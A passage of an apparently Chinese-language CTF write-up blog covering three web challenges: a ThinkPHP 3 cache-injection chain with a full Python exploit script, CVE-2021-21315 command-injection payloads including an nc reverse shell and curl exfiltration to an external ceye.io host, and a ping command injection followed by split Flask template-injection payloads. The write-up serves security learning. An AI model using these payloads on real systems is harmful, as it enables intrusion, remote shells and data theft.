 <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/^(EXP|NEQ|GT|EGT|LT|ELT|OR|XOR|LIKE|NOTLIKE|NOT BETWEEN|NOTBETWEEN|BETWEEN|NOTIN|NOT IN|IN)$/i&#x27;</span>,<span class="variable">$value</span>))&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line"><span class="comment">//        $value .= &#x27; &#x27;;</span></span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>如果我们调用<code>buy()</code>方法，传入了<code>$filter</code>参数为<code>rlog</code>，在获取<code>$_POST[&#39;discount&#39;]</code>变量时调用了I方法，传入的变量实际上是 <code>call_user_func(&#39;rlog&#39;, $discount)</code>，而<code>$discount</code>可控，在<code>rlog</code>方法中，<code>$event</code>默认为空（如果不为空缺省，实际上在PHP5中缺省函数也能调用，只不过会发生报错），传入的<code>$discount</code>与文件内容拼接，完成注入。</p>
<p>POST方法如下（需要先登录）：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">POST &#x2F;index.php?s&#x3D;&#x2F;home&#x2F;index&#x2F;buy HTTP&#x2F;1.1</span><br><span class="line">Cookie: PHPSESSID&#x3D;d33e9d6b455405efc0037fbeb11f1541</span><br><span class="line"> </span><br><span class="line">filter&#x3D;rlog&amp;discount&#x3D;xxxxxxxx</span><br></pre></td></tr></table></figure>
<p>调用函数后生成缓存文件并在两秒后删除，接着跳出函数，回到控制器buy，再一次调用<code>rlog()</code>记录事件buy，所以这里调用了两次<code>rlog()</code>，中间有一次<code>rest()</code>。</p>
<p><img src="https://raw.githubusercontent.com/JOHN-FROD/PicGo/main/blog-img/20210510120429.png" alt="img"></p>
<p>所以完整的触发链子：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">rlog(<span class="variable">$discount</span>, <span class="string">&#x27;&#x27;</span>); <span class="comment">// 两次延时rest();rest();</span></span><br><span class="line">rest(); <span class="comment">// 两次rlog调用间延时</span></span><br><span class="line">rlog(<span class="variable">$return</span>[<span class="string">&#x27;code&#x27;</span>], <span class="string">&#x27;&#x27;</span>buy); <span class="comment">//两次延时rest();rest();</span></span><br></pre></td></tr></table></figure>
<h3 id="绕过Tp3缓存注释"><a href="#绕过Tp3缓存注释" class="headerlink" title="绕过Tp3缓存注释"></a>绕过Tp3缓存注释</h3><p>这部分POC也比较多了，网上找一找就有了，大概是用%0a或者%0d注入文件内容，重写一行，参见链接：</p>
<p><a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/u010433704/article/details/103069229" >ThinkPhp3.2.3缓存漏洞复现以及修复建议<i class="fas fa-external-link-alt"></i></a></p>
<h3 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h3><p>循环POST提交discount，注意这里需要用<code>unquote()</code>即url编码解码一次。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cache</span>():</span></span><br><span class="line">    <span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line">        url = <span class="string">&quot;http://47.75.138.18/index.php?s=/home/index/buy&quot;</span></span><br><span class="line">        discount = unquote(<span class="string">&#x27;%0dsystem(&quot;cat /flag&quot;)//&#x27;</span>, <span class="string">&#x27;utf-8&#x27;</span>)</span><br><span class="line">        payload = &#123;<span class="string">&#x27;discount&#x27;</span>: discount, <span class="string">&#x27;filter&#x27;</span>: <span class="string">&#x27;rlog&#x27;</span>&#125;</span><br><span class="line">        headers = &#123;<span class="string">&#x27;Cookie&#x27;</span>: <span class="string">&#x27;PHPSESSID=2846ee569600018f0cf748bf66edd8dc&#x27;</span>&#125;</span><br><span class="line">        response = requests.request(<span class="string">&quot;POST&quot;</span>, url, headers=headers, data=payload)</span><br><span class="line">        <span class="comment"># print(response.text)</span></span><br></pre></td></tr></table></figure>
<p>同时GET请求缓存文件名，通过获取当前时间的整型值md5加密，如果返回关键字则写入文件终止循环</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get</span>():</span></span><br><span class="line">    <span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line">        t = <span class="built_in">str</span>(<span class="built_in">int</span>(time.time()))</span><br><span class="line">        hl = hashlib.md5()</span><br><span class="line">        hl.update(t.encode(encoding=<span class="string">&#x27;utf-8&#x27;</span>))</span><br><span class="line">        url = <span class="string">&quot;http://47.75.138.18/Application/Runtime/Temp/&quot;</span> + hl.hexdigest() + <span class="string">&#x27;.php&#x27;</span></span><br><span class="line">        response = requests.get(url=url)</span><br><span class="line">        <span class="keyword">if</span> response.text.find(<span class="string">&#x27;Aurora&#x27;</span>) != -<span class="number">1</span>:</span><br><span class="line">            print(response.text)</span><br><span class="line">            f = <span class="built_in">open</span>(<span class="string">&quot;flag.txt&quot;</span>, <span class="string">&quot;w&quot;</span>)</span><br><span class="line">            f.write(response.text)</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure>
<p>最终EXP：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> urllib.parse <span class="keyword">import</span> unquote</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">import</span> threading</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">login</span>():</span></span><br><span class="line">	<span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line">		url = <span class="string">&quot;http://47.75.138.18/index.php?s=/home/index/check.html&quot;</span></span><br><span class="line">		payload = &#123;<span class="string">&#x27;username&#x27;</span>: <span class="string">&#x27;guest&#x27;</span>, <span class="string">&#x27;password&#x27;</span>: <span class="string">&#x27;guest&#x27;</span>&#125;</span><br><span class="line">		headers = &#123;<span class="string">&#x27;Cookie&#x27;</span>: <span class="string">&#x27;PHPSESSID=2846ee569600018f0cf748bf66edd8dc&#x27;</span>&#125;</span><br><span class="line">		response = requests.request(<span class="string">&quot;POST&quot;</span>, url, headers=headers, data=payload)</span><br><span class="line">		<span class="keyword">if</span> response.text.find(<span class="string">&quot;成功&quot;</span>) != -<span class="number">1</span>:</span><br><span class="line">			print(<span class="string">&quot;login success!\n&quot;</span>)</span><br><span class="line">			print(<span class="string">&quot;-------------\n&quot;</span>)</span><br><span class="line">			<span class="keyword">break</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">			print(<span class="string">&quot;login failed!\n&quot;</span>)</span><br><span class="line">			print(<span class="string">&quot;-------------\n&quot;</span>)</span><br><span class="line">            </span><br><span class="line">            </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cache</span>():</span></span><br><span class="line">	<span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line">		url = <span class="string">&quot;http://47.75.138.18/index.php?s=/home/index/buy&quot;</span></span><br><span class="line">		discount = unquote(<span class="string">&#x27;%0dsystem(&quot;cat /flag&quot;)//&#x27;</span>, <span class="string">&#x27;utf-8&#x27;</span>)</span><br><span class="line">		payload = &#123;<span class="string">&#x27;discount&#x27;</span>: discount, <span class="string">&#x27;filter&#x27;</span>: <span class="string">&#x27;rlog&#x27;</span>&#125;</span><br><span class="line">		headers = &#123;<span class="string">&#x27;Cookie&#x27;</span>: <span class="string">&#x27;PHPSESSID=2846ee569600018f0cf748bf66edd8dc&#x27;</span>&#125;</span><br><span class="line">		response = requests.request(<span class="string">&quot;POST&quot;</span>, url, headers=headers, data=payload)</span><br><span class="line">		<span class="comment"># print(response.text)</span></span><br><span class="line">        </span><br><span class="line">        </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get</span>():</span></span><br><span class="line">    <span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line">        t = <span class="built_in">str</span>(<span class="built_in">int</span>(time.time()))</span><br><span class="line">        hl = hashlib.md5()</span><br><span class="line">        hl.update(t.encode(encoding=<span class="string">&#x27;utf-8&#x27;</span>))</span><br><span class="line">        url = <span class="string">&quot;http://47.75.138.18/Application/Runtime/Temp/&quot;</span> + hl.hexdigest() +</span><br><span class="line">        <span class="string">&#x27;.php&#x27;</span></span><br><span class="line">        response = requests.get(url=url)</span><br><span class="line">        <span class="keyword">if</span> response.text.find(<span class="string">&#x27;Aurora&#x27;</span>) != -<span class="number">1</span>:</span><br><span class="line">            print(response.text)</span><br><span class="line">            f = <span class="built_in">open</span>(<span class="string">&quot;flag.txt&quot;</span>, <span class="string">&quot;w&quot;</span>)</span><br><span class="line">            f.write(response.text)</span><br><span class="line">            <span class="keyword">break</span>        </span><br><span class="line">            </span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    login()</span><br><span class="line">    threads = [threading.Thread(target=cache), threading.Thread(target=get)]</span><br><span class="line">    <span class="keyword">for</span> thread <span class="keyword">in</span> threads:</span><br><span class="line">    	thread.start()            </span><br></pre></td></tr></table></figure>
<br/>

<h2 id="物理黑客攻击"><a href="#物理黑客攻击" class="headerlink" title="物理黑客攻击"></a>物理黑客攻击</h2><p>题目进去是个小游戏，但是其实这个游戏和flag一点关系都没有。</p>
<p><img src="https://raw.githubusercontent.com/JOHN-FROD/PicGo/main/blog-img/20210508161524.png" alt="image-20210508161523911"></p>
<p>正确做法是直接找到<code>/source</code>源文件：</p>
<p><img src="https://raw.githubusercontent.com/JOHN-FROD/PicGo/main/blog-img/20210508164710.png" alt="image-20210508163017565"></p>
<p>该路由中调用了Node.js的系统信息库<code>systeminformation</code>，然后继续查看源码可以在package.json中看到其版本为4.34.15，会造成一个安全漏洞，而这个安全漏洞就是cve-2021-21315。</p>
<p>在网上找下poc：<a class="link"   target="_blank" rel="noopener" href="https://www.ym68.cc/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/2021/275111.html" >Node.js命令sanitize注入漏洞复现(CVE-2021-21315)<i class="fas fa-external-link-alt"></i></a></p>
<ul>
<li>反弹shell</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?service_name[]&#x3D;$(nc -e &#x2F;bin&#x2F;sh [ip] [port])</span><br></pre></td></tr></table></figure>
<p>然后在自己服务器上监听即可。</p>
<ul>
<li>curl外带数据</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?service_name[]&#x3D;$(curl http:&#x2F;&#x2F;t6n089.ceye.io&#x2F;?a&#x3D;&#96;ls -a &#x2F;|base64&#96;)</span><br></pre></td></tr></table></figure>
<p>这里base64编码的目的是防止有些特殊字符像空格会被过滤，将得到的数据base64解码</p>
<p><img src="https://raw.githubusercontent.com/JOHN-FROD/PicGo/main/blog-img/20210508165311.png" alt="image-20210508165306355"></p>
<p>发现flag是藏在根目录下的隐藏文件中<code>.fl4g</code>，最后把文件读一下即可</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?service_name[]&#x3D;$(curl http:&#x2F;&#x2F;t6n089.ceye.io&#x2F;?a&#x3D;&#96;cat &#x2F;.fl4g|base64&#96;)</span><br></pre></td></tr></table></figure>
<br/>

<h2 id="拿shell就给flag？"><a href="#拿shell就给flag？" class="headerlink" title="拿shell就给flag？"></a>拿shell就给flag？</h2><p>描述：You must shorter than me!</p>
<p><img src="https://raw.githubusercontent.com/JOHN-FROD/PicGo/main/blog-img/20210510151851.png" alt="image-20210508113103357"></p>
<p>首先一看ping就想到命令注入或者SSRF，但是一开始没找到传参的方法，找一下响应包</p>
<p><img src="https://raw.githubusercontent.com/JOHN-FROD/PicGo/main/blog-img/20210510151851.png" alt="image-20210508113055618"></p>
<p>提示参数是url，先尝试命令注入，命令注入需要把前一个语句闭合或者截断，然后加上自己的语句，常用的方式有<code>;</code>、<code>&amp;</code>、<code>|</code>、<code>%0a</code>等，尝试了几个之后发现<code>%0a</code>能够使用，其他被过滤了，直接<code>ls</code>看一下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url&#x3D;%0als</span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/JOHN-FROD/PicGo/main/blog-img/20210510151851.png" alt="image-20210508113621360"></p>
<p>能看到只有一个文件，那就看一下内容：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url&#x3D;%0acat index.php</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$url</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;url&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$url</span>))&#123;</span><br><span class="line">    <span class="keyword">if</span>(strlen(<span class="variable">$url</span>)&gt;<span class="number">15</span>)&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;你多长心里没点逼数吗&quot;</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span> <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/\*|\;|\||\&amp;/&#x27;</span>,<span class="variable">$url</span>))&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;就你TM叫韩毅&quot;</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        system(<span class="string">&quot;ping -c 4 <span class="subst">$url</span>&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">	header(<span class="string">&#x27;hint:?url=&#x27;</span>);</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">&#x27;给我一个网址我帮你ping&#x27;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这里还发现过滤了几个关键的符号<code>*</code>、<code>&amp;</code>、<code>|</code>，而且把长度限制在15个字符内，导致很难反弹shell，而且通过测试发现也无法保存文件，权限不够。接着可以看到根目录下有flag文件，但是读不了，看一眼权限</p>
<p><img src="https://raw.githubusercontent.com/JOHN-FROD/PicGo/main/blog-img/20210510151851.png" alt="image-20210508114058500"></p>
<p>只有root用户才能读，当前用户是www-data，看来这个用户是行不通了。</p>
<p>注意到根目录下还有个flask文件，尝试一下默认端口5000能不能进去</p>
<p><img src="https://raw.githubusercontent.com/JOHN-FROD/PicGo/main/blog-img/20210510151851.png" alt="image-20210508114427890"></p>
<p>默认端口进来了，里面是一个表单提交，既然是flask那么大概率是模板注入</p>
<p><img src="https://raw.githubusercontent.com/JOHN-FROD/PicGo/main/blog-img/20210510151851.png" alt="image-20210508114601607"></p>
<p>经过尝试之后发现似乎把长度限制在20个字符以内，那么就麻烦大了，好像没有一个读文件的payload能这么短的啊，就这样卡了好久。后来经过提示之后想到可以用几个拼接起来，既然这里有6个注入框，那么我们可以用的就有120个字符了，先找来一个短的能够用的payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;lipsum.__globals__.os.popen(&#39;cat &#x2F;flag&#39;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>然后用set进行拼接：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">a&#x3D;&#123;%set a&#x3D;lipsum%&#125;</span><br><span class="line">&amp;b&#x3D;&#123;%set b&#x3D;a.__globals__%&#125;</span><br><span class="line">&amp;c&#x3D;&#123;%set c&#x3D;b.os%&#125;</span><br><span class="line">&amp;d&#x3D;&#123;%set d&#x3D;c.popen%&#125;</span><br><span class="line">&amp;e&#x3D;&#123;%set e&#x3D;d(&#39;cat &#x2F;flag&#39;)%&#125;</span><br><span class="line">&amp;f&#x3D;&#123;&#123;e.read()&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>问题来了，这里一个<code>set</code>和<code>__globals__</code>已经超长了，再次卡住。。。</p>
<p>看wp后才发现原来request也能拼接，先把request进行拼接，然后把<code>__globals__</code>和<code>cat /flag</code>作为参数传进去即可，这样就能不超过20个字符了。</p>
<p>get:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?s&#x3D;__globals__&amp;t&#x3D;cat &#x2F;flag</span><br></pre></td></tr></table></figure>
<p>post:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">a&#x3D;&#123;%set a&#x3D;lipsum%&#125;</span><br><span class="line">&amp;b&#x3D;&#123;%set b&#x3D;request%&#125;</span><br><span class="line">&amp;c&#x3D;&#123;%set c&#x3D;b.args%&#125;</span><br><span class="line">&amp;d&#x3D;&#123;%set d&#x3D;a[c.s].os%&#125;</span><br><span class="line">&amp;e&#x3D;&#123;%set e&#x3D;d.popen%&#125;</span><br><span class="line">&amp;f&#x3D;&#123;&#123;e(c.t).read()&#125;&#125;</span><br></pre></td></tr></table></figure>
<br/>

<h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h2><p><a class="link"   target="_blank" rel="noopener" href="https://jan.show/?p=89" >第一次出题（AURORA内部赛）<i class="fas fa-external-link-alt"></i></a></p>
<p>[<a class="link"   target="_blank" rel="noopener" href="https://oatmeal.vip/ctf-wp/buyaflag/" >AuroraCTF 2021] Buy A Flag<i class="fas fa-external-link-alt"></i></a></p>

        </div>

        
            <div class="post-copyright-info">
                <div class="article-copyright-info-container">
    <ul>
        <li>Post title：2021 Aurora内部赛</li>
        <li>Post author：John_Frod</li>
        <li>Create time：2021-05-10 15:18:04</li>
        <li>
            Post link：https://keep.xpoet.cn/2021/05/10/2021-Aurora内部赛/
        </li>
        <li>
            Copyright Notice：All articles in this blog are licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">BY-NC-SA</a> unless stating additionally.
        </li>
    </ul>
</div>

            </div>
        

        
            <div class="article-nav">
                
                    <div class="article-prev">
                        <a class="prev"
                           rel="prev"
                           href="/2021/05/12/PHP%E7%89%B9%E6%80%A7%E6%80%BB%E7%BB%93/"
                        >
                            <span class="left arrow-icon flex-center" >
                              <i class="fas fa-chevron-left"></i>
                            </span>
                            <span class="title flex-center">
                                <span class="post-nav-title-item">PHP特性总结</span>
                                <span class="post-nav-item">Prev posts</span>
                            </span>
                        </a>
                    </div>
                
                
                    <div class="article-next">
                        <a class="next"
                           rel="next"
                           href="/2021/05/06/%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/"
                        >
                            <span class="title flex-center">
                                <span class="post-nav-title-item">模板注入总结</span>
                                <span class="post-nav-item">Next posts</span>
                            </span>
                            <span class="right arrow-icon flex-center" >
                              <i class="fas fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        

        
    </div>
</div>


                    
                </main>

            </div>

            <div class="page-main-content-bottom">
                <footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
              <span>2020</span> -
            
            2021 <i class="fas fa-heart icon-animate"></i> <a href="/">John_Frod</a>
        </div>
        
            <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                    <span id="busuanzi_container_site_uv">
                        Visitor Count <span id="busuanzi_value_site_uv"></span>&ensp;
                    </span>
                
                
                    <span id="busuanzi_container_site_pv">
                        Totalview <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="theme-info info-item">
            Powered by <a target="_blank" href="https://hexo.io">Hexo</a> | Theme <a class="theme-version" target="_blank"></a>
        </div>
    </div>
</footer>

            </div>
        </div>
    </main>

    <div class="sidebar-tools">
        <div class="tools-container">
    <ul class="tools-list">
        
            <li class="search popup-trigger">
                <i class="fas fa-search"></i>
            </li>
        

        

        <!-- TOC aside toggle -->
        
            <li class="tools-item page-aside-toggle">
                <i class="fas fa-outdent"></i>
            </li>
        

    </ul>
</div>

    </div>

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">

    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-expand-width flex-center">
            <i class="fas fa-arrows-alt-h"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        <li class="tools-item tool-scroll-to-top flex-center">
            <i class="fas fa-arrow-up"></i>
        </li>

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="tools-ul-1">
        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

    </ul>
</div>

    </div>

    <!-- page aside -->
    <aside class="page-aside">
        
            <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#2021-Aurora%E5%86%85%E9%83%A8%E8%B5%9B"><span class="nav-text">2021 Aurora内部赛</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#buy-a-flag"><span class="nav-text">buy_a_flag</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="nav-text">前置知识</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#MVC%E6%A1%86%E6%9E%B6"><span class="nav-text">MVC框架</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#URL%E8%B7%AF%E7%94%B1%E6%A8%A1%E5%BC%8F"><span class="nav-text">URL路由模式</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Application%E7%9B%AE%E5%BD%95"><span class="nav-text">Application目录</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BC%A0%E5%8F%82%E6%96%B9%E6%B3%95-I"><span class="nav-text">传参方法 I()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BC%93%E5%AD%98%E6%96%B9%E6%B3%95S"><span class="nav-text">缓存方法S()</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%BC%B1%E5%8F%A3%E4%BB%A4%E7%99%BB%E5%BD%95"><span class="nav-text">弱口令登录</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#POST-discount"><span class="nav-text">POST $discount</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#tp3%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1"><span class="nav-text">tp3代码审计</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%87%E8%83%BD%E7%9A%84call-user-func"><span class="nav-text">万能的call_user_func</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BB%95%E8%BF%87Tp3%E7%BC%93%E5%AD%98%E6%B3%A8%E9%87%8A"><span class="nav-text">绕过Tp3缓存注释</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#EXP"><span class="nav-text">EXP</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%89%A9%E7%90%86%E9%BB%91%E5%AE%A2%E6%94%BB%E5%87%BB"><span class="nav-text">物理黑客攻击</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%8B%BFshell%E5%B0%B1%E7%BB%99flag%EF%BC%9F"><span class="nav-text">拿shell就给flag？</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%82%E8%80%83%E8%B5%84%E6%96%99"><span class="nav-text">参考资料</span></a></li></ol></li></ol>
    </div>
</div>
        
    </aside>

    <!-- image viewer -->
    <div class="image-viewer-container">
    <div class="img-box">
        <img src="">
    </div>
</div>


</div>



    <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-icon">
            <i class="fas fa-search"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="Search..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="popup-btn-close">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>



<script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.0.4/source/js/utils.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.0.4/source/js/main.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.0.4/source/js/header-shrink.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.0.4/source/js/back2top.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.0.4/source/js/dark-light-toggle.js"></script>


    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.0.4/source/js/local-search.js"></script>




    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.0.4/source/js/left-side-toggle.js"></script>

    
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.0.4/source/js/code-copy.js"></script>
    

    
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.0.4/source/js/libs/anime.min.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.0.4/source/js/toc.js"></script>
    


</body>
</html>